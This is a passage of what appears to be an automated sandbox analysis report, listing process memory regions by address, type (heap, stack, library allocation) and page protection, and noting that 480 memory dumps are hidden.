page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
1C580227000
|
trusted library allocation
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
1CBF0780000
|
heap
|
page read and write
|
||
|
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
1C581E09000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB0F000
|
heap
|
page read and write
|
||
|
13D6B12F000
|
heap
|
page read and write
|
||
|
1C5EA9F8000
|
heap
|
page read and write
|
||
|
13D6B1A9000
|
heap
|
page read and write
|
||
|
7FFB4B143000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D6CB3E000
|
heap
|
page read and write
|
||
|
13D6CB17000
|
heap
|
page read and write
|
||
|
13D6D2C2000
|
heap
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
1C5ECA36000
|
heap
|
page read and write
|
||
|
1C5EC509000
|
heap
|
page read and write
|
||
|
1C581DD6000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B226000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D019000
|
heap
|
page read and write
|
||
|
7FFB4B144000
|
trusted library allocation
|
page read and write
|
||
|
1CBF0A50000
|
heap
|
page read and write
|
||
|
13D6CAED000
|
heap
|
page read and write
|
||
|
13D6D11B000
|
heap
|
page read and write
|
||
|
13D6B198000
|
heap
|
page read and write
|
||
|
8A7D47E000
|
stack
|
page read and write
|
||
|
13D6CAD3000
|
heap
|
page read and write
|
||
|
13D6D2B6000
|
heap
|
page read and write
|
||
|
13D6D21A000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6CAD0000
|
heap
|
page read and write
|
||
|
13D6CB5C000
|
heap
|
page read and write
|
||
|
13D6D127000
|
heap
|
page read and write
|
||
|
8A7D4FD000
|
stack
|
page read and write
|
||
|
13D6D2D9000
|
heap
|
page read and write
|
||
|
13D6D043000
|
heap
|
page read and write
|
||
|
1C5ECCE8000
|
heap
|
page read and write
|
||
|
13D6D481000
|
heap
|
page read and write
|
||
|
13D6CFD0000
|
heap
|
page read and write
|
||
|
13D6D0BD000
|
heap
|
page read and write
|
||
|
1C59000F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3A0000
|
trusted library allocation
|
page read and write
|
||
|
1C5EAB70000
|
trusted library allocation
|
page read and write
|
||
|
186A5FE000
|
stack
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
page read and write
|
||
|
1C580085000
|
trusted library allocation
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6D0A8000
|
heap
|
page read and write
|
||
|
13D6CB64000
|
heap
|
page read and write
|
||
|
1C581E45000
|
trusted library allocation
|
page read and write
|
||
|
13D6D3A3000
|
heap
|
page read and write
|
||
|
13D6CF70000
|
heap
|
page read and write
|
||
|
1C580479000
|
trusted library allocation
|
page read and write
|
||
|
13D6D2FD000
|
heap
|
page read and write
|
||
|
13D6CFD0000
|
heap
|
page read and write
|
||
|
13D6D094000
|
heap
|
page read and write
|
||
|
13D6D418000
|
heap
|
page read and write
|
||
|
13D6D106000
|
heap
|
page read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
|
13D6CAFB000
|
heap
|
page read and write
|
||
|
13D6CAF5000
|
heap
|
page read and write
|
||
|
13D6CAD7000
|
heap
|
page read and write
|
||
|
7FFB4B15B000
|
trusted library allocation
|
page read and write
|
||
|
13D6D01C000
|
heap
|
page read and write
|
||
|
13D6CAE0000
|
heap
|
page read and write
|
||
|
13D6D21A000
|
heap
|
page read and write
|
||
|
13D6CAFE000
|
heap
|
page read and write
|
||
|
7DF42CCF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C5EAB90000
|
trusted library allocation
|
page read and write
|
||
|
1C5EA9E0000
|
heap
|
page read and write
|
||
|
1C5EC3F0000
|
trusted library allocation
|
page read and write
|
||
|
8A7D9BE000
|
stack
|
page read and write
|
||
|
1C5ECA75000
|
heap
|
page read and write
|
||
|
1C581DEE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D6B1D3000
|
heap
|
page read and write
|
||
|
8A7D57E000
|
stack
|
page read and write
|
||
|
13D6CB67000
|
heap
|
page read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page read and write
|
||
|
13D6D0CD000
|
heap
|
page read and write
|
||
|
1C5901B2000
|
trusted library allocation
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
1C580484000
|
trusted library allocation
|
page read and write
|
||
|
1C580789000
|
trusted library allocation
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
1C5EABB0000
|
trusted library allocation
|
page read and write
|
||
|
13D6CB75000
|
heap
|
page read and write
|
||
|
13D6CAF6000
|
heap
|
page read and write
|
||
|
13D6D354000
|
heap
|
page read and write
|
||
|
13D6CB1B000
|
heap
|
page read and write
|
||
|
1C5ECAFF000
|
heap
|
page read and write
|
||
|
1C580001000
|
trusted library allocation
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
13D6D081000
|
heap
|
page read and write
|
||
|
8A7D1EE000
|
stack
|
page read and write
|
||
|
13D6D2C0000
|
heap
|
page read and write
|
||
|
13D6B1AB000
|
heap
|
page read and write
|
||
|
13D6B1B3000
|
heap
|
page read and write
|
||
|
13D6D116000
|
heap
|
page read and write
|
||
|
13D6CB82000
|
heap
|
page read and write
|
||
|
1C5EA9ED000
|
heap
|
page read and write
|
||
|
13D6D10E000
|
heap
|
page read and write
|
||
|
13D6CFE0000
|
heap
|
page read and write
|
||
|
13D6D0C8000
|
heap
|
page read and write
|
||
|
13D6D079000
|
heap
|
page read and write
|
||
|
1C5902EA000
|
trusted library allocation
|
page read and write
|
||
|
1C5ECBA0000
|
heap
|
page read and write
|
||
|
13D6CB29000
|
heap
|
page read and write
|
||
|
1C5ECB70000
|
heap
|
page execute and read and write
|
||
|
13D6B1A9000
|
heap
|
page read and write
|
||
|
13D6CB51000
|
heap
|
page read and write
|
||
|
7FFB4B140000
|
trusted library allocation
|
page read and write
|
||
|
13D6B11F000
|
heap
|
page read and write
|
||
|
1C5EAA32000
|
heap
|
page read and write
|
||
|
13D6D037000
|
heap
|
page read and write
|
||
|
13D6D2B9000
|
heap
|
page read and write
|
||
|
13D6CB2F000
|
heap
|
page read and write
|
||
|
13D6CAF5000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
8A7D6F9000
|
stack
|
page read and write
|
||
|
13D6CAD3000
|
heap
|
page read and write
|
||
|
1C581F41000
|
trusted library allocation
|
page read and write
|
||
|
13D6B1AB000
|
heap
|
page read and write
|
||
|
13D6CF87000
|
heap
|
page read and write
|
||
|
13D6D0F6000
|
heap
|
page read and write
|
||
|
13D6D2A7000
|
heap
|
page read and write
|
||
|
13D6D2C2000
|
heap
|
page read and write
|
||
|
13D6CAD1000
|
heap
|
page read and write
|
||
|
13D6D056000
|
heap
|
page read and write
|
||
|
1C5EAB30000
|
heap
|
page read and write
|
||
|
13D6D03A000
|
heap
|
page read and write
|
||
|
1C581DB3000
|
trusted library allocation
|
page read and write
|
||
|
1C5ECD35000
|
heap
|
page read and write
|
||
|
A5BF7FE000
|
unkown
|
page read and write
|
||
|
13D6B1A5000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6D2C5000
|
heap
|
page read and write
|
||
|
13D6CB1F000
|
heap
|
page read and write
|
||
|
13D6D091000
|
heap
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C5EAAC2000
|
heap
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
13D6D05F000
|
heap
|
page read and write
|
||
|
13D6B310000
|
heap
|
page read and write
|
||
|
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
|
186AAFE000
|
stack
|
page read and write
|
||
|
13D6CB06000
|
heap
|
page read and write
|
||
|
13D6B1AB000
|
heap
|
page read and write
|
||
|
1C5ECC80000
|
heap
|
page read and write
|
||
|
13D6D11E000
|
heap
|
page read and write
|
||
|
13D6D13D000
|
heap
|
page read and write
|
||
|
13D6CFFE000
|
heap
|
page read and write
|
||
|
13D6B31E000
|
heap
|
page read and write
|
||
|
13D6D0B8000
|
heap
|
page read and write
|
||
|
13D6D270000
|
heap
|
page read and write
|
||
|
13D6CB48000
|
heap
|
page read and write
|
||
|
13D6D0EB000
|
heap
|
page read and write
|
||
|
1C5EABE0000
|
heap
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
13D6D089000
|
heap
|
page read and write
|
||
|
13D6D030000
|
heap
|
page read and write
|
||
|
13D6B120000
|
heap
|
page read and write
|
||
|
13D6CB4B000
|
heap
|
page read and write
|
||
|
13D6B070000
|
heap
|
page read and write
|
||
|
1C5ECB30000
|
heap
|
page read and write
|
||
|
13D6D2B9000
|
heap
|
page read and write
|
||
|
1C59006F000
|
trusted library allocation
|
page read and write
|
||
|
8A7D0E3000
|
stack
|
page read and write
|
||
|
13D6B120000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6D40C000
|
heap
|
page read and write
|
||
|
1C5818B8000
|
trusted library allocation
|
page read and write
|
||
|
13D6CFA3000
|
heap
|
page read and write
|
||
|
13D6AF90000
|
heap
|
page read and write
|
||
|
13D6D01E000
|
heap
|
page read and write
|
||
|
13D6CB12000
|
heap
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
13D6D01A000
|
heap
|
page read and write
|
||
|
13D6D0C0000
|
heap
|
page read and write
|
||
|
13D6D018000
|
heap
|
page read and write
|
||
|
13D6D018000
|
heap
|
page read and write
|
||
|
13D6CAF2000
|
heap
|
page read and write
|
||
|
7FFB4B1FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C5805D7000
|
trusted library allocation
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6D044000
|
heap
|
page read and write
|
||
|
13D6D02C000
|
heap
|
page read and write
|
||
|
13D6CB61000
|
heap
|
page read and write
|
||
|
13D6CAE2000
|
heap
|
page read and write
|
||
|
1C5EAACE000
|
heap
|
page read and write
|
||
|
13D6B1A4000
|
heap
|
page read and write
|
There are 480 hidden memdumps, click here to show them.